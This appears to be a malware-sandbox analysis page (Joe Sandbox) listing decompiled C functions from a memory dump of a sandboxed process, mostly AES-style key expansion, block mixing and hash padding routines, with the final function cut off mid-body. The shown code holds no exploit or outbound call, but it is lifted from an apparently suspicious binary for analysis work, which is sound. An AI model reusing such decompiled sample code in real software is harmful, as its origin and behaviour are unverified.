    Function 00C5FD20, Relevance: .2, Instructions: 220Crypto
    C-Code - Quality: 72%
    			E00C5FD20(signed char* __ecx, signed int* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t86;
				signed int _t112;
				signed int _t124;
				signed int _t125;
				signed int _t184;
				signed int _t191;
				signed int _t194;
				signed int _t198;
				signed int _t220;
				signed int _t235;
				signed int _t239;
				signed int _t243;
				signed int* _t244;
				unsigned int _t246;
				signed int _t252;
				signed int _t255;

				_t86 =  *0xc6a004; // 0x26d30358
				_v8 = _t86 ^ _t252;
				_t245 = __ecx;
				_v68 = 0x1000000;
				_t244 = __edx;
				_v64 = 0x2000000;
				_v60 = 0x4000000;
				_v56 = 0x8000000;
				_v52 = 0x10000000;
				_v48 = 0x20000000;
				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
				_v44 = 0x40000000;
				_v40 = 0x80000000;
				_v36 = 0x1b000000;
				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
				_v32 = 0x36000000;
				_v28 = 0x6c000000;
				_v24 = 0xd8000000;
				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
				_v20 = 0xab000000;
				_v16 = 0x4d000000;
				_v12 = 0x9a000000;
				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
				_t125 = 8;
				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
				do {
					_t112 = _t244[7];
					_t184 = _t125 & 0x80000007;
					if(_t184 < 0) {
						_t184 = (_t184 - 0x00000001 | 0xfffffff8) + 1;
						_t255 = _t184;
					}
					if(_t255 != 0) {
						if(_t184 == 4) {
							_t191 = _t112 >> 0x00000018 & 0x0000000f;
							_t235 = (_t112 >> 0x1c) + (_t112 >> 0x1c);
							_t194 = _t112 >> 0x00000010 & 0x0000000f;
							_t239 = (_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f);
							_t198 = _t112 >> 0x00000008 & 0x0000000f;
							_t243 = (_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f);
							_t245 = ((( *(_t191 + 0xc680a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0xc680a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0xc680a8 + _t243 * 8) & 0x000000ff) << 8;
							_t112 = ( *((_t112 & 0x0000000f) + 0xc680a8 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *(_t191 + 0xc680a8 + _t235 * 8) & 0x000000ff) << 8) + ( *(_t194 + 0xc680a8 + _t239 * 8) & 0x000000ff) << 8) + ( *(_t198 + 0xc680a8 + _t243 * 8) & 0x000000ff) << 8);
						}
					} else {
						asm("rol eax, 0x8");
						_t246 = _t112;
						_t245 = _t246 & 0x0000000f;
						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x1c) + (_t246 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000010 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x00000014 & 0x0000000f) + (_t246 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 >> 0x00000008 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x0000000c & 0x0000000f) + (_t246 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t246 & 0x0000000f) + 0xc680a8 + ((_t246 >> 0x00000004 & 0x0000000f) + (_t246 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
						_t68 = _t125 - 1; // 0x7
						_t220 = _t68;
						if(_t220 < 0) {
							_t220 = _t220 + 7;
						}
						_t112 = _t124 ^  *(_t252 + (_t220 >> 3) * 4 - 0x40);
					}
					_t125 = _t125 + 1;
					_t244[8] =  *_t244 ^ _t112;
					_t244 =  &(_t244[1]);
				} while (_t125 < 0x3c);
				return E00C51252(_t125, _v8 ^ _t252, _t244, _t245);
			}






































    0x00c5fd26
    0x00c5fd2d
    0x00c5fd32
    0x00c5fd34
    0x00c5fd3c
    0x00c5fd3e
    0x00c5fd45
    0x00c5fd58
    0x00c5fd68
    0x00c5fd78
    0x00c5fd7f
    0x00c5fd8e
    0x00c5fd9e
    0x00c5fdae
    0x00c5fdb5
    0x00c5fdc5
    0x00c5fdd5
    0x00c5fde5
    0x00c5fdec
    0x00c5fdfc
    0x00c5fe0c
    0x00c5fe1c
    0x00c5fe23
    0x00c5fe45
    0x00c5fe5e
    0x00c5fe6c
    0x00c5fe8e
    0x00c5feb0
    0x00c5feb3
    0x00c5feb3
    0x00c5feb8
    0x00c5febe
    0x00c5fec4
    0x00c5fec4
    0x00c5fec4
    0x00c5fec5
    0x00c5ff55
    0x00c5ff5e
    0x00c5ff64
    0x00c5ff7b
    0x00c5ff81
    0x00c5ff9d
    0x00c5ffa0
    0x00c5ffb7
    0x00c5ffc4
    0x00c5ffc4
    0x00c5fecb
    0x00c5fecb
    0x00c5fece
    0x00c5ff28
    0x00c5ff3b
    0x00c5ff3d
    0x00c5ff3d
    0x00c5ff44
    0x00c5ff46
    0x00c5ff46
    0x00c5ff4c
    0x00c5ff4c
    0x00c5ffc8
    0x00c5ffcb
    0x00c5ffce
    0x00c5ffd1
    0x00c5ffea

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5F6A0, Relevance: .1, Instructions: 149Crypto
    C-Code - Quality: 97%
    			E00C5F6A0(signed char* __ecx) {
				signed int _v5;
				signed int _v6;
				signed char _t226;
				signed char _t229;
				signed char _t231;
				signed char _t233;
				signed char _t235;
				signed char _t238;
				signed int _t239;
				signed int _t240;
				signed char _t241;
				signed int _t242;
				signed int _t243;
				signed char _t244;
				signed int _t245;
				signed int _t246;
				signed char _t247;
				signed int _t248;
				signed int _t249;
				signed char _t250;
				signed int _t251;
				signed char _t252;
				signed int _t253;
				signed char _t254;
				signed int _t255;
				signed char _t256;
				signed int _t257;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;

				_push(__ecx);
				_t238 = __ecx[4];
				_t229 = __ecx[0xc];
				_t250 = __ecx[8];
				_t147 = _t229 & 0x000000ff;
				_v5 = _t238;
				_v6 = _t250;
				_t262 = (_t229 & 0x000000ff) + _t147 * 2;
				_t239 = (_t238 & 0x000000ff) + (_t238 & 0x000000ff) * 2;
				 *__ecx =  *(0xc67aa9 + _t239 * 2) & 0x000000ff ^  *(0xc67aa8 + _t262 * 2) ^ _t229 ^ _t250;
				_t251 = (_t250 & 0x000000ff) + (_t250 & 0x000000ff) * 2;
				__ecx[4] =  *(0xc67aa9 + _t251 * 2) & 0x000000ff ^  *(0xc67aa8 + _t239 * 2) ^ _t229 ^ _t229;
				_t240 = (_t229 & 0x000000ff) + (_t229 & 0x000000ff) * 2;
				_t252 = __ecx[9];
				_t231 = __ecx[1];
				__ecx[8] =  *(0xc67aa9 + _t240 * 2) & 0x000000ff ^  *(0xc67aa8 + _t251 * 2) ^ _v5 ^ __ecx[0xd];
				_t241 = __ecx[5];
				__ecx[0xc] =  *(0xc67aa8 + _t240 * 2) & 0x000000ff ^  *(0xc67aa9 + _t262 * 2) ^ _v6 ^ _v5;
				_t167 = _t231 & 0x000000ff;
				_v6 = _t241;
				_v5 = _t252;
				_t263 = (_t231 & 0x000000ff) + _t167 * 2;
				_t242 = (_t241 & 0x000000ff) + (_t241 & 0x000000ff) * 2;
				__ecx[1] =  *(0xc67aa9 + _t242 * 2) & 0x000000ff ^  *(0xc67aa8 + _t263 * 2) ^ _t231 ^ _t252;
				_t253 = (_t252 & 0x000000ff) + (_t252 & 0x000000ff) * 2;
				__ecx[5] =  *(0xc67aa9 + _t253 * 2) & 0x000000ff ^  *(0xc67aa8 + _t242 * 2) ^ _t231 ^ _t231;
				_t243 = (_t231 & 0x000000ff) + (_t231 & 0x000000ff) * 2;
				_t254 = __ecx[0xa];
				_t233 = __ecx[2];
				__ecx[9] =  *(0xc67aa9 + _t243 * 2) & 0x000000ff ^  *(0xc67aa8 + _t253 * 2) ^ _v6 ^ __ecx[0xe];
				_t244 = __ecx[6];
				__ecx[0xd] =  *(0xc67aa8 + _t243 * 2) & 0x000000ff ^  *(0xc67aa9 + _t263 * 2) ^ _v5 ^ _v6;
				_t187 = _t233 & 0x000000ff;
				_v6 = _t244;
				_v5 = _t254;
				_t264 = (_t233 & 0x000000ff) + _t187 * 2;
				_t245 = (_t244 & 0x000000ff) + (_t244 & 0x000000ff) * 2;
				__ecx[2] =  *(0xc67aa9 + _t245 * 2) & 0x000000ff ^  *(0xc67aa8 + _t264 * 2) ^ _t233 ^ _t254;
				_t255 = (_t254 & 0x000000ff) + (_t254 & 0x000000ff) * 2;
				__ecx[6] =  *(0xc67aa9 + _t255 * 2) & 0x000000ff ^  *(0xc67aa8 + _t245 * 2) ^ _t233 ^ _t233;
				_t246 = (_t233 & 0x000000ff) + (_t233 & 0x000000ff) * 2;
				_t256 = __ecx[0xb];
				_t235 = __ecx[3];
				__ecx[0xa] =  *(0xc67aa9 + _t246 * 2) & 0x000000ff ^  *(0xc67aa8 + _t255 * 2) ^ _v6 ^ __ecx[0xf];
				_t247 = __ecx[7];
				__ecx[0xe] =  *(0xc67aa8 + _t246 * 2) & 0x000000ff ^  *(0xc67aa9 + _t264 * 2) ^ _v5 ^ _v6;
				_t207 = _t235 & 0x000000ff;
				_v6 = _t247;
				_v5 = _t256;
				_t265 = (_t235 & 0x000000ff) + _t207 * 2;
				_t248 = (_t247 & 0x000000ff) + (_t247 & 0x000000ff) * 2;
				__ecx[3] =  *(0xc67aa9 + _t248 * 2) & 0x000000ff ^  *(0xc67aa8 + _t265 * 2) ^ _t235 ^ _t256;
				_t257 = (_t256 & 0x000000ff) + (_t256 & 0x000000ff) * 2;
				__ecx[7] =  *(0xc67aa9 + _t257 * 2) & 0x000000ff ^  *(0xc67aa8 + _t248 * 2) ^ _t235 ^ _t235;
				_t249 = (_t235 & 0x000000ff) + (_t235 & 0x000000ff) * 2;
				__ecx[0xb] =  *(0xc67aa9 + _t249 * 2) & 0x000000ff ^  *(0xc67aa8 + _t257 * 2) ^ _v6 ^ _t235;
				_t226 =  *(0xc67aa8 + _t249 * 2) & 0x000000ff ^  *(0xc67aa9 + _t265 * 2) ^ _v5 ^ _v6;
				__ecx[0xf] = _t226;
				return _t226;
			}


































    0x00c5f6a3
    0x00c5f6ab
    0x00c5f6ae
    0x00c5f6b1
    0x00c5f6b4
    0x00c5f6b7
    0x00c5f6ba
    0x00c5f6bd
    0x00c5f6c3
    0x00c5f6d9
    0x00c5f6de
    0x00c5f6f4
    0x00c5f6fd
    0x00c5f714
    0x00c5f717
    0x00c5f71a
    0x00c5f732
    0x00c5f735
    0x00c5f738
    0x00c5f73b
    0x00c5f73e
    0x00c5f741
    0x00c5f747
    0x00c5f75d
    0x00c5f763
    0x00c5f779
    0x00c5f782
    0x00c5f797
    0x00c5f79c
    0x00c5f79f
    0x00c5f7b7
    0x00c5f7ba
    0x00c5f7bd
    0x00c5f7c0
    0x00c5f7c3
    0x00c5f7c6
    0x00c5f7cc
    0x00c5f7e2
    0x00c5f7e8
    0x00c5f7fe
    0x00c5f807
    0x00c5f81e
    0x00c5f821
    0x00c5f824
    0x00c5f83c
    0x00c5f83f
    0x00c5f842
    0x00c5f845
    0x00c5f848
    0x00c5f84b
    0x00c5f851
    0x00c5f867
    0x00c5f86d
    0x00c5f883
    0x00c5f889
    0x00c5f8a0
    0x00c5f8b5
    0x00c5f8b8
    0x00c5f8c1

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5F3F0, Relevance: .1, Instructions: 144Crypto
    C-Code - Quality: 100%
    			E00C5F3F0(signed char* __ecx) {
				signed char* _v8;
				intOrPtr _v12;
				signed char _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t283;
				signed char* _t285;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t296;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;

				_v8 = __ecx;
				_t279 = _v8;
				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
				_t294 = _v12;
				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
				 *_t279 =  *(0xc67aaa + _t287 * 2) & 0x000000ff ^  *(0xc67aac + _t305 * 2) ^  *(0xc67aab + _t301 * 2) ^  *(_t294 + 0xc67aad);
				_t279[4] =  *(0xc67aac + _t287 * 2) & 0x000000ff ^  *(0xc67aab + _t305 * 2) ^  *(0xc67aad + _t301 * 2) ^  *(_t294 + 0xc67aaa);
				_t279[8] =  *(0xc67aab + _t287 * 2) & 0x000000ff ^  *(0xc67aad + _t305 * 2) ^  *(0xc67aaa + _t301 * 2) ^  *(_t294 + 0xc67aac);
				_t279[0xc] =  *(0xc67aad + _t287 * 2) & 0x000000ff ^  *(0xc67aaa + _t305 * 2) ^  *(0xc67aac + _t301 * 2) ^  *(_t294 + 0xc67aab);
				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
				_t281 = _v8;
				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
				 *(_t281 + 1) =  *(0xc67aaa + _t289 * 2) & 0x000000ff ^  *(0xc67aac + _t296 * 2) ^  *(0xc67aab + _t306 * 2) ^  *(0xc67aad + _t302 * 2);
				 *(_t281 + 5) =  *(0xc67aac + _t289 * 2) & 0x000000ff ^  *(0xc67aab + _t296 * 2) ^  *(0xc67aad + _t306 * 2) ^  *(0xc67aaa + _t302 * 2);
				 *(_t281 + 9) =  *(0xc67aab + _t289 * 2) & 0x000000ff ^  *(0xc67aad + _t296 * 2) ^  *(0xc67aaa + _t306 * 2) ^  *(0xc67aac + _t302 * 2);
				 *(_t281 + 0xd) =  *(0xc67aad + _t289 * 2) & 0x000000ff ^  *(0xc67aaa + _t296 * 2) ^  *(0xc67aac + _t306 * 2) ^  *(0xc67aab + _t302 * 2);
				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
				_t283 = _v8;
				 *(_t283 + 2) =  *(0xc67aaa + _t291 * 2) & 0x000000ff ^  *(0xc67aac + _t298 * 2) ^  *(0xc67aab + _t307 * 2) ^  *(0xc67aad + _t303 * 2);
				 *(_t283 + 6) =  *(0xc67aac + _t291 * 2) & 0x000000ff ^  *(0xc67aab + _t298 * 2) ^  *(0xc67aad + _t307 * 2) ^  *(0xc67aaa + _t303 * 2);
				 *(_t283 + 0xa) =  *(0xc67aab + _t291 * 2) & 0x000000ff ^  *(0xc67aad + _t298 * 2) ^  *(0xc67aaa + _t307 * 2) ^  *(0xc67aac + _t303 * 2);
				 *(_t283 + 0xe) =  *(0xc67aad + _t291 * 2) & 0x000000ff ^  *(0xc67aaa + _t298 * 2) ^  *(0xc67aac + _t307 * 2) ^  *(0xc67aab + _t303 * 2);
				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
				_t285 = _v8;
				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
				_t285[3] =  *(0xc67aaa + _t293 * 2) & 0x000000ff ^  *(0xc67aac + _t300 * 2) ^  *(0xc67aab + _t308 * 2) ^  *(0xc67aad + _t304 * 2);
				_t285[7] =  *(0xc67aac + _t293 * 2) & 0x000000ff ^  *(0xc67aab + _t300 * 2) ^  *(0xc67aad + _t308 * 2) ^  *(0xc67aaa + _t304 * 2);
				_t285[0xb] =  *(0xc67aab + _t293 * 2) & 0x000000ff ^  *(0xc67aad + _t300 * 2) ^  *(0xc67aaa + _t308 * 2) ^  *(0xc67aac + _t304 * 2);
				_t278 =  *(0xc67aad + _t293 * 2) & 0x000000ff ^  *(0xc67aaa + _t300 * 2) ^  *(0xc67aac + _t308 * 2) ^  *(0xc67aab + _t304 * 2);
				_t285[0xf] = _t278;
				return _t278;
			}


























    0x00c5f3ff
    0x00c5f404
    0x00c5f407
    0x00c5f40e
    0x00c5f411
    0x00c5f418
    0x00c5f41f
    0x00c5f43e
    0x00c5f45c
    0x00c5f47b
    0x00c5f49d
    0x00c5f4ac
    0x00c5f4b2
    0x00c5f4b8
    0x00c5f4be
    0x00c5f4c1
    0x00c5f4e1
    0x00c5f501
    0x00c5f521
    0x00c5f547
    0x00c5f553
    0x00c5f559
    0x00c5f55f
    0x00c5f565
    0x00c5f568
    0x00c5f588
    0x00c5f5a8
    0x00c5f5c8
    0x00c5f5ee
    0x00c5f5fa
    0x00c5f600
    0x00c5f606
    0x00c5f60c
    0x00c5f60f
    0x00c5f62f
    0x00c5f64f
    0x00c5f66f
    0x00c5f688
    0x00c5f691
    0x00c5f698

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C60F40, Relevance: .1, Instructions: 129Crypto
    C-Code - Quality: 97%
    			E00C60F40(intOrPtr __ecx, char* __edx) {
				void* __edi;
				intOrPtr _t77;
				unsigned int _t123;
				int _t125;
				char* _t130;
				void* _t157;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				intOrPtr _t170;
				void* _t171;

				_t170 = __ecx;
				_t130 = __edx;
				_t77 =  *((intOrPtr*)(__ecx + 0x40));
				 *((char*)(_t77 + __ecx)) = 0x80;
				_t157 = _t77 + 1;
				if(_t77 >= 0x38) {
					if(_t157 < 0x40) {
						_t165 = _t157 + __ecx;
						_t125 = memset(_t165, 0, 0x40 << 2);
						_t166 = _t165 + (0x40 - _t157 >> 2);
						memset(_t166, _t125, 0 << 0);
						_t171 = _t171 + 0x18;
						_t164 = _t166;
					}
					E00C61150(_t170, _t170);
					E00C53610(_t164, _t170, 0, 0x38);
				} else {
					if(_t157 < 0x38) {
						_t167 = _t157 + __ecx;
						memset(_t167 + (0x38 - _t157 >> 2), memset(_t167, 0, 0x38 << 2), 0 << 0);
					}
				}
				 *(_t170 + 0x48) =  *(_t170 + 0x48) + ( *(_t170 + 0x40) << 3);
				asm("adc dword [esi+0x4c], 0x0");
				 *((char*)(_t170 + 0x38)) =  *(_t170 + 0x48) & 0x000000ff;
				 *((char*)(_t170 + 0x39)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 8;
				 *((char*)(_t170 + 0x3a)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x10;
				 *((char*)(_t170 + 0x3b)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x18;
				 *((char*)(_t170 + 0x3c)) = E00C5DE30( *(_t170 + 0x48), 0x20,  *(_t170 + 0x4c));
				 *((char*)(_t170 + 0x3d)) = E00C5DE30( *(_t170 + 0x48), 0x28,  *(_t170 + 0x4c));
				 *((char*)(_t170 + 0x3e)) =  *(_t170 + 0x4e) & 0x000000ff;
				 *((char*)(_t170 + 0x3f)) =  *(_t170 + 0x4f) & 0x000000ff;
				E00C61150(_t170, _t170);
				 *_t130 =  *(_t170 + 0x50);
				 *((char*)(_t130 + 4)) =  *(_t170 + 0x54);
				 *((char*)(_t130 + 8)) =  *(_t170 + 0x58);
				 *((char*)(_t130 + 0xc)) =  *(_t170 + 0x5c);
				 *((char*)(_t130 + 1)) =  *(_t170 + 0x50) >> 8;
				 *((char*)(_t130 + 5)) =  *(_t170 + 0x54) >> 8;
				 *((char*)(_t130 + 9)) =  *(_t170 + 0x58) >> 8;
				 *((char*)(_t130 + 0xd)) =  *(_t170 + 0x5c) >> 8;
				 *((char*)(_t130 + 2)) =  *(_t170 + 0x50) >> 0x10;
				 *((char*)(_t130 + 6)) =  *(_t170 + 0x54) >> 0x10;
				 *((char*)(_t130 + 0xa)) =  *(_t170 + 0x58) >> 0x10;
				 *((char*)(_t130 + 0xe)) =  *(_t170 + 0x5c) >> 0x10;
				 *((char*)(_t130 + 3)) =  *(_t170 + 0x50) >> 0x18;
				 *((char*)(_t130 + 7)) =  *(_t170 + 0x54) >> 0x18;
				 *((char*)(_t130 + 0xb)) =  *(_t170 + 0x58) >> 0x18;
				_t123 =  *(_t170 + 0x5c) >> 0x18;
				 *(_t130 + 0xf) = _t123;
				return _t123;
			}















    0x00c60f42
    0x00c60f44
    0x00c60f47
    0x00c60f4a
    0x00c60f4e
    0x00c60f54
    0x00c60f7a
    0x00c60f81
    0x00c60f8d
    0x00c60f8d
    0x00c60f94
    0x00c60f94
    0x00c60f94
    0x00c60f94
    0x00c60f9a
    0x00c60fa4
    0x00c60f56
    0x00c60f59
    0x00c60f60
    0x00c60f73
    0x00c60f73
    0x00c60f59
    0x00c60fb2
    0x00c60fb5
    0x00c60fbd
    0x00c60fca
    0x00c60fda
    0x00c60fea
    0x00c60ffd
    0x00c6100d
    0x00c61018
    0x00c6101f
    0x00c61022
    0x00c6102a
    0x00c6102f
    0x00c61035
    0x00c6103b
    0x00c61044
    0x00c6104d
    0x00c61056
    0x00c6105f
    0x00c61068
    0x00c61071
    0x00c6107a
    0x00c61083
    0x00c6108c
    0x00c61095
    0x00c6109e
    0x00c610a4
    0x00c610a9
    0x00c610ad

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5FC90, Relevance: .1, Instructions: 53Crypto
    C-Code - Quality: 100%
    			E00C5FC90(signed int* __ecx, signed int* __edx) {
				signed char _t40;
				unsigned int _t41;
				unsigned int _t43;
				unsigned int _t45;
				unsigned int _t47;

				_t41 =  *__edx;
				__ecx[3] = __ecx[3] ^  *__edx;
				__ecx[3] = __ecx[3] ^ __edx[1];
				__ecx[3] = __ecx[3] ^ __edx[2];
				_t40 = __edx[3];
				__ecx[3] = __ecx[3] ^ _t40;
				__ecx[2] = __ecx[2] ^ _t41 >> 0x00000008;
				_t43 = __edx[1];
				 *__ecx =  *__ecx ^ _t41 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t41 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t43 >> 0x00000008;
				_t45 = __edx[2];
				__ecx[0] = __ecx[0] ^ _t43 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t43 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t45 >> 0x00000008;
				_t47 = __edx[3];
				__ecx[0] = __ecx[0] ^ _t45 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t45 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t47 >> 0x00000008;
				__ecx[0] = __ecx[0] ^ _t47 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t47 >> 0x00000010;
				return _t40;
			}








    0x00c5fc97
    0x00c5fc9f
    0x00c5fca5
    0x00c5fcab
    0x00c5fcae
    0x00c5fcb1
    0x00c5fcb7
    0x00c5fcba
    0x00c5fcc0
    0x00c5fcc7
    0x00c5fccf
    0x00c5fcd2
    0x00c5fcd8
    0x00c5fce0
    0x00c5fce8
    0x00c5fceb
    0x00c5fcf1
    0x00c5fcf9
    0x00c5fd01
    0x00c5fd07
    0x00c5fd0d
    0x00c5fd13

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10011D50, Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 225
    C-Code - Quality: 55%
    			E10011D50(void* __ecx, intOrPtr __edx, signed char _a4) {
				intOrPtr _v12;
				void* _v16;
				short _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t93;
				unsigned int _t99;
				intOrPtr _t103;
				void* _t108;
				void* _t111;
				void* _t112;
				short _t114;
				intOrPtr _t119;
				intOrPtr* _t124;
				signed char _t131;
				signed short* _t136;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				signed short* _t157;
				intOrPtr _t159;
				intOrPtr _t163;

				_t93 = 0;
				_v12 = __edx;
				_t161 = __ecx;
				_v20 = 0;
				_t157 = 0;
				_v24 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					L60:
					return _t93;
				}
				_t93 =  *0x1001f3a4( *((intOrPtr*)(__edx + 0x20)),  &_v16);
				_t131 = _a4;
				if((_t131 & 0x08000000) == 0) {
					if((_t131 & 0x00800000) == 0) {
						if((_t131 & 0x00200000) != 0) {
							goto L57;
						}
						if((_t131 & 0x00100000) == 0) {
							if((_t131 & 0x00010000) == 0) {
								L27:
